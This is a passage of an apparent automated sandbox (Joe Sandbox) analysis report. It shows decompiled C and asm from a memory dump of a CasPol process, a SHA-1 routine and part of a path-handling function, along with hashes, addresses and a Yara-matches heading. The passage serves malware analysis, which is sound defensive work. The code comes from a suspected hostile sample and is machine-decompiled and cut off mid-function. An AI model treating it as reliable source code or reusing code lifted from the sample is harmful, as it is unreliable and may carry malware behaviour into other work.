                                                                                                                                                                                                                                                                                                                            				} while (_t463 < 0x14);
                                                                                                                                                                                                                                                                                                                            				_t464 = 0x14;
                                                                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                                                                            					asm("rol esi, 0x5");
                                                                                                                                                                                                                                                                                                                            					asm("ror eax, 0x2");
                                                                                                                                                                                                                                                                                                                            					_v16 = _t404;
                                                                                                                                                                                                                                                                                                                            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                                                                                                                                                                                                                                                                            					_t334 = _v12;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t502;
                                                                                                                                                                                                                                                                                                                            					asm("rol esi, 0x5");
                                                                                                                                                                                                                                                                                                                            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                                                                                                                                                                                                                                                                            					asm("ror ebx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_t505 = _t279;
                                                                                                                                                                                                                                                                                                                            					_v16 = _t358;
                                                                                                                                                                                                                                                                                                                            					_t365 = _v12;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t420;
                                                                                                                                                                                                                                                                                                                            					asm("rol edx, 0x5");
                                                                                                                                                                                                                                                                                                                            					asm("ror ecx, 0x2");
                                                                                                                                                                                                                                                                                                                            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                                                                                                                                                                                                                                                                            					_t423 = _v12;
                                                                                                                                                                                                                                                                                                                            					_v8 = _t334;
                                                                                                                                                                                                                                                                                                                            					_v8 = _t365;
                                                                                                                                                                                                                                                                                                                            					_v12 = _t292;
                                                                                                                                                                                                                                                                                                                            					asm("rol eax, 0x5");
                                                                                                                                                                                                                                                                                                                            					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9ebc9
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
                                                                                                                                                                                                                                                                                                                            				_t480[0x17] = 0;
                                                                                                                                                                                                                                                                                                                            				return _t311;
                                                                                                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                                                                                                            0x0040c2a9
                                                                                                                                                                                                                                                                                                                            0x0040c2ac
                                                                                                                                                                                                                                                                                                                            0x0040c2bb
                                                                                                                                                                                                                                                                                                                            0x0040c2be
                                                                                                                                                                                                                                                                                                                            0x0040c2c5
                                                                                                                                                                                                                                                                                                                            0x0040c2c8
                                                                                                                                                                                                                                                                                                                            0x0040c2cb
                                                                                                                                                                                                                                                                                                                            0x0040c2ce
                                                                                                                                                                                                                                                                                                                            0x0040c2d1
                                                                                                                                                                                                                                                                                                                            0x0040c2d9
                                                                                                                                                                                                                                                                                                                            0x0040c2e7
                                                                                                                                                                                                                                                                                                                            0x0040c2ea
                                                                                                                                                                                                                                                                                                                            0x0040c2ed
                                                                                                                                                                                                                                                                                                                            0x0040c2ed
                                                                                                                                                                                                                                                                                                                            0x0040c2f4
                                                                                                                                                                                                                                                                                                                            0x0040c2f7
                                                                                                                                                                                                                                                                                                                            0x0040c2fa
                                                                                                                                                                                                                                                                                                                            0x0040c302
                                                                                                                                                                                                                                                                                                                            0x0040c310
                                                                                                                                                                                                                                                                                                                            0x0040c313
                                                                                                                                                                                                                                                                                                                            0x0040c31a
                                                                                                                                                                                                                                                                                                                            0x0040c31d
                                                                                                                                                                                                                                                                                                                            0x0040c320
                                                                                                                                                                                                                                                                                                                            0x0040c323
                                                                                                                                                                                                                                                                                                                            0x0040c326
                                                                                                                                                                                                                                                                                                                            0x0040c32f
                                                                                                                                                                                                                                                                                                                            0x0040c336
                                                                                                                                                                                                                                                                                                                            0x0040c336
                                                                                                                                                                                                                                                                                                                            0x0040c33c
                                                                                                                                                                                                                                                                                                                            0x0040c355
                                                                                                                                                                                                                                                                                                                            0x0040c358
                                                                                                                                                                                                                                                                                                                            0x0040c35f
                                                                                                                                                                                                                                                                                                                            0x0040c362
                                                                                                                                                                                                                                                                                                                            0x0040c365
                                                                                                                                                                                                                                                                                                                            0x0040c377
                                                                                                                                                                                                                                                                                                                            0x0040c381
                                                                                                                                                                                                                                                                                                                            0x0040c384
                                                                                                                                                                                                                                                                                                                            0x0040c38d
                                                                                                                                                                                                                                                                                                                            0x0040c390
                                                                                                                                                                                                                                                                                                                            0x0040c397
                                                                                                                                                                                                                                                                                                                            0x0040c39a
                                                                                                                                                                                                                                                                                                                            0x0040c3a0
                                                                                                                                                                                                                                                                                                                            0x0040c3b3
                                                                                                                                                                                                                                                                                                                            0x0040c3ba
                                                                                                                                                                                                                                                                                                                            0x0040c3bd
                                                                                                                                                                                                                                                                                                                            0x0040c3c0
                                                                                                                                                                                                                                                                                                                            0x0040c3c3
                                                                                                                                                                                                                                                                                                                            0x0040c3cc
                                                                                                                                                                                                                                                                                                                            0x0040c3cf
                                                                                                                                                                                                                                                                                                                            0x0040c3e2
                                                                                                                                                                                                                                                                                                                            0x0040c3e5
                                                                                                                                                                                                                                                                                                                            0x0040c3ef
                                                                                                                                                                                                                                                                                                                            0x0040c3f2
                                                                                                                                                                                                                                                                                                                            0x0040c3f4
                                                                                                                                                                                                                                                                                                                            0x0040c3fd
                                                                                                                                                                                                                                                                                                                            0x0040c400
                                                                                                                                                                                                                                                                                                                            0x0040c413
                                                                                                                                                                                                                                                                                                                            0x0040c419
                                                                                                                                                                                                                                                                                                                            0x0040c41c
                                                                                                                                                                                                                                                                                                                            0x0040c423
                                                                                                                                                                                                                                                                                                                            0x0040c425
                                                                                                                                                                                                                                                                                                                            0x0040c428
                                                                                                                                                                                                                                                                                                                            0x0040c42b
                                                                                                                                                                                                                                                                                                                            0x0040c42e
                                                                                                                                                                                                                                                                                                                            0x0040c431
                                                                                                                                                                                                                                                                                                                            0x0040c434
                                                                                                                                                                                                                                                                                                                            0x0040c43d
                                                                                                                                                                                                                                                                                                                            0x0040c442
                                                                                                                                                                                                                                                                                                                            0x0040c445
                                                                                                                                                                                                                                                                                                                            0x0040c445
                                                                                                                                                                                                                                                                                                                            0x0040c458
                                                                                                                                                                                                                                                                                                                            0x0040c45b
                                                                                                                                                                                                                                                                                                                            0x0040c45e
                                                                                                                                                                                                                                                                                                                            0x0040c465
                                                                                                                                                                                                                                                                                                                            0x0040c468
                                                                                                                                                                                                                                                                                                                            0x0040c46b
                                                                                                                                                                                                                                                                                                                            0x0040c46e
                                                                                                                                                                                                                                                                                                                            0x0040c481
                                                                                                                                                                                                                                                                                                                            0x0040c484
                                                                                                                                                                                                                                                                                                                            0x0040c48f
                                                                                                                                                                                                                                                                                                                            0x0040c492
                                                                                                                                                                                                                                                                                                                            0x0040c49e
                                                                                                                                                                                                                                                                                                                            0x0040c4a1
                                                                                                                                                                                                                                                                                                                            0x0040c4a7

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 126da201e399a354888b8c1d6532e8032acd0ef72efab1350674e1e616d0c987
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65021DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                                            			E01244120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                                                                            				char _v532;
                                                                                                                                                                                                                                                                                                                            				char _v540;
                                                                                                                                                                                                                                                                                                                            				signed short _v544;
                                                                                                                                                                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                                                                                                                                                                            				signed short* _v552;
                                                                                                                                                                                                                                                                                                                            				signed short _v556;
                                                                                                                                                                                                                                                                                                                            				signed short* _v560;
                                                                                                                                                                                                                                                                                                                            				signed short* _v564;
                                                                                                                                                                                                                                                                                                                            				signed short* _v568;
                                                                                                                                                                                                                                                                                                                            				void* _v570;
                                                                                                                                                                                                                                                                                                                            				signed short* _v572;
                                                                                                                                                                                                                                                                                                                            				signed short _v576;
                                                                                                                                                                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                                                                                                                                                                            				char _v581;
                                                                                                                                                                                                                                                                                                                            				void* _v584;
                                                                                                                                                                                                                                                                                                                            				unsigned int _v588;
                                                                                                                                                                                                                                                                                                                            				signed short* _v592;
                                                                                                                                                                                                                                                                                                                            				void* _v597;
                                                                                                                                                                                                                                                                                                                            				void* _v600;
                                                                                                                                                                                                                                                                                                                            				void* _v604;
                                                                                                                                                                                                                                                                                                                            				void* _v609;
                                                                                                                                                                                                                                                                                                                            				void* _v616;
                                                                                                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t161;
                                                                                                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t163;
                                                                                                                                                                                                                                                                                                                            				void* _t169;
                                                                                                                                                                                                                                                                                                                            				signed short _t173;
                                                                                                                                                                                                                                                                                                                            				signed short _t177;
                                                                                                                                                                                                                                                                                                                            				signed short _t181;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t182;
                                                                                                                                                                                                                                                                                                                            				signed int _t185;
                                                                                                                                                                                                                                                                                                                            				signed int _t213;
                                                                                                                                                                                                                                                                                                                            				signed int _t225;
                                                                                                                                                                                                                                                                                                                            				short _t233;
                                                                                                                                                                                                                                                                                                                            				signed char _t234;
                                                                                                                                                                                                                                                                                                                            				signed int _t242;
                                                                                                                                                                                                                                                                                                                            				signed int _t243;
                                                                                                                                                                                                                                                                                                                            				signed int _t244;
                                                                                                                                                                                                                                                                                                                            				signed int _t245;
                                                                                                                                                                                                                                                                                                                            				signed int _t250;
void* _t251;
signed short* _t254;
void* _t255;
signed int _t256;
void* _t257;
signed short* _t260;
signed short _t265;
signed short* _t269;
signed short _t271;
signed short** _t272;
signed short* _t275;
signed short _t282;
signed short _t283;
signed short _t290;
signed short _t299;
signed short _t307;
signed int _t308;
signed short _t311;
signed short* _t315;
signed short _t316;
void* _t317;
void* _t319;
signed short* _t321;
void* _t322;
void* _t323;
unsigned int _t324;
signed int _t325;
void* _t326;
signed int _t327;
signed int _t329;

_t329 = (_t327 & 0xfffffff8) - 0x24c;
_v8 =  *0x131d360 ^ _t329;
_t157 = _a8;
_t321 = _a4;
_t315 = __edx;
_v548 = __ecx;
_t305 = _a20;
_v560 = _a12;
_t260 = _a16;
_v564 = __edx;
_v580 = _a8;
_v572 = _t260;
_v544 = _a20;
if( *__edx <= 8) {
	L3:
	if(_t260 != 0) {
		 *_t260 = 0;
	}
	_t254 =  &_v532;
	_v588 = 0x208;
	if((_v548 & 0x00000001) != 0) {
		_v556 =  *_t315;
		_v552 = _t315[2];
		_t161 = L0125F232( &_v556);
		_t316 = _v556;
		_v540 = _t161;
		goto L17;
	} else {
		_t306 = 0x208;
		_t298 = _t315;
		_t316 = L01246E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
		if(_t316 == 0) {
			L68:
			_t322 = 0xc0000033;
			goto L39;
		} else {
			while(_v581 == 0) {
				_t233 = _v588;
				if(_t316 > _t233) {
					_t234 = _v548;
					if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
						_t254 = L01244620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
						if(_t254 == 0) {
							_t169 = 0xc0000017;
						} else {
							_t298 = _v564;
							_v588 = _t316;
							_t306 = _t316;
							_t316 = L01246E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
							if(_t316 != 0) {
								continue;
							} else {
								goto L68;
							}
						}
					} else {
						goto L90;
					}
				} else {
					_v556 = _t316;
					 *((short*)(_t329 + 0x32)) = _t233;
					_v552 = _t254;
					if(_t316 < 2) {
						L11:
						if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
							_t161 = 5;
						} else {
							if(_t316 < 6) {
								L87:
								_t161 = 3;
							} else {
								_t242 = _t254[2] & 0x0000ffff;
								if(_t242 != 0x5c) {
									if(_t242 == 0x2f) {
										goto L16;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														goto L87;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													goto L101;
                                                                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                                                                            													L16:
                                                                                                                                                                                                                                                                                                                            													_t161 = 2;
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                                                                            										_t243 =  *_t254 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                                                                                                                                                                                                                                                            											if(_t316 < 4) {
                                                                                                                                                                                                                                                                                                                            												L81:
                                                                                                                                                                                                                                                                                                                            												_t161 = 4;
                                                                                                                                                                                                                                                                                                                            												goto L17;
                                                                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                                                                            												_t244 = _t254[1] & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            												if(_t244 != 0x5c) {
                                                                                                                                                                                                                                                                                                                            													if(_t244 == 0x2f) {
                                                                                                                                                                                                                                                                                                                            														goto L60;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														goto L81;
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                                                                            													L60:
                                                                                                                                                                                                                                                                                                                            													if(_t316 < 6) {
                                                                                                                                                                                                                                                                                                                            														L83:
                                                                                                                                                                                                                                                                                                                            														_t161 = 1;
                                                                                                                                                                                                                                                                                                                            														goto L17;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														_t245 = _t254[2] & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            														if(_t245 != 0x2e) {
                                                                                                                                                                                                                                                                                                                            															if(_t245 == 0x3f) {
                                                                                                                                                                                                                                                                                                                            																goto L62;
                                                                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                                                                            																goto L83;
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                                                                            															L62:
                                                                                                                                                                                                                                                                                                                            															if(_t316 < 8) {
                                                                                                                                                                                                                                                                                                                            																L85:
                                                                                                                                                                                                                                                                                                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                                                                                                                                                                                                                                                            																goto L17;
                                                                                                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                                                                                                            																_t250 = _t254[3] & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            																if(_t250 != 0x5c) {
                                                                                                                                                                                                                                                                                                                            																	if(_t250 == 0x2f) {
                                                                                                                                                                                                                                                                                                                            																		goto L64;
                                                                                                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                                                                                                            																		goto L85;
                                                                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                                                                                                            																	L64:
                                                                                                                                                                                                                                                                                                                            																	_t161 = 6;
                                                                                                                                                                                                                                                                                                                            																	goto L17;
                                                                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            											goto L101;
                                                                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            									L17:
                                                                                                                                                                                                                                                                                                                            									if(_t161 != 2) {
                                                                                                                                                                                                                                                                                                                            										_t162 = _t161 - 1;
                                                                                                                                                                                                                                                                                                                            										if(_t162 > 5) {
                                                                                                                                                                                                                                                                                                                            											goto L18;
                                                                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                                                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M012445F8))) {
                                                                                                                                                                                                                                                                                                                            												case 0:
                                                                                                                                                                                                                                                                                                                            													_v568 = 0x1201078;
                                                                                                                                                                                                                                                                                                                            													__eax = 2;
                                                                                                                                                                                                                                                                                                                            													goto L20;
                                                                                                                                                                                                                                                                                                                            												case 1:
                                                                                                                                                                                                                                                                                                                            													goto L18;
                                                                                                                                                                                                                                                                                                                            												case 2:
                                                                                                                                                                                                                                                                                                                            													_t163 = 4;
                                                                                                                                                                                                                                                                                                                            													goto L19;
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            										goto L41;
                                                                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                                                                                                            										_t163 = 0;
                                                                                                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                                                                                                            										_v568 = 0x12011c4;
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                                                                                                            									_v588 = _t163;
                                                                                                                                                                                                                                                                                                                            									_v564 = _t163 + _t163;
                                                                                                                                                                                                                                                                                                                            									_t306 =  *_v568 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                                                                                                                                                                                                                                            									_v576 = _t265;
                                                                                                                                                                                                                                                                                                                            									if(_t265 > 0xfffe) {
                                                                                                                                                                                                                                                                                                                            										L90:
                                                                                                                                                                                                                                                                                                                            										_t322 = 0xc0000106;
                                                                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                                                                            										if(_t321 != 0) {
                                                                                                                                                                                                                                                                                                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                                            												if(_v580 != 0) {
                                                                                                                                                                                                                                                                                                                            													goto L23;
                                                                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                                                                            													_t322 = 0xc0000106;
                                                                                                                                                                                                                                                                                                                            													goto L39;
                                                                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                                                                            												_t177 = _t306;
                                                                                                                                                                                                                                                                                                                            												goto L25;
                                                                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                                                                            											goto L101;
                                                                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                                                                            											if(_v580 == _t321) {
                                                                                                                                                                                                                                                                                                                            												_t322 = 0xc000000d;
                                                                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                                                                            												L23:
                                                                                                                                                                                                                                                                                                                            												_t173 = L01244620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                                                                                                                                                                                                                                            												_t269 = _v592;
                                                                                                                                                                                                                                                                                                                            												_t269[2] = _t173;
                                                                                                                                                                                                                                                                                                                            												if(_t173 == 0) {
                                                                                                                                                                                                                                                                                                                            													_t322 = 0xc0000017;
                                                                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                                                                            													_t316 = _v556;
                                                                                                                                                                                                                                                                                                                            													 *_t269 = 0;
                                                                                                                                                                                                                                                                                                                            													_t321 = _t269;
                                                                                                                                                                                                                                                                                                                            													_t269[1] = _v576;
                                                                                                                                                                                                                                                                                                                            													_t177 =  *_v568 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            													L25:
                                                                                                                                                                                                                                                                                                                            													_v580 = _t177;
                                                                                                                                                                                                                                                                                                                            													if(_t177 == 0) {
                                                                                                                                                                                                                                                                                                                            														L29:
                                                                                                                                                                                                                                                                                                                            														_t307 =  *_t321 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                                                                            														_t290 =  *_t321 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            														_v576 = _t290;
                                                                                                                                                                                                                                                                                                                            														_t310 = _t177 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                                            															_t307 =  *_t321 & 0xffff;
                                                                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                                                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                                                                                                                                                                            															L0126F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                                                                                                                                                                                                                                            															_t329 = _t329 + 0xc;
                                                                                                                                                                                                                                                                                                                            															_t311 = _v580;
                                                                                                                                                                                                                                                                                                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            															 *_t321 = _t225;
                                                                                                                                                                                                                                                                                                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													_t271 = _v556 - _v588 + _v588;
                                                                                                                                                                                                                                                                                                                            													_v580 = _t307;
                                                                                                                                                                                                                                                                                                                            													_v576 = _t271;
                                                                                                                                                                                                                                                                                                                            													if(_t271 != 0) {
                                                                                                                                                                                                                                                                                                                            														_t308 = _t271 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            														_v588 = _t308;
                                                                                                                                                                                                                                                                                                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                                                                                                                                                                                            															L0126F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                                                                                                                                                                                                                                            															_t329 = _t329 + 0xc;
                                                                                                                                                                                                                                                                                                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                                            															 *_t321 = _t213;
                                                                                                                                                                                                                                                                                                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                                                                                                                                                                                                                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                                                                            													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = L012252A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																L0123EB70(1, 0x13179a0);
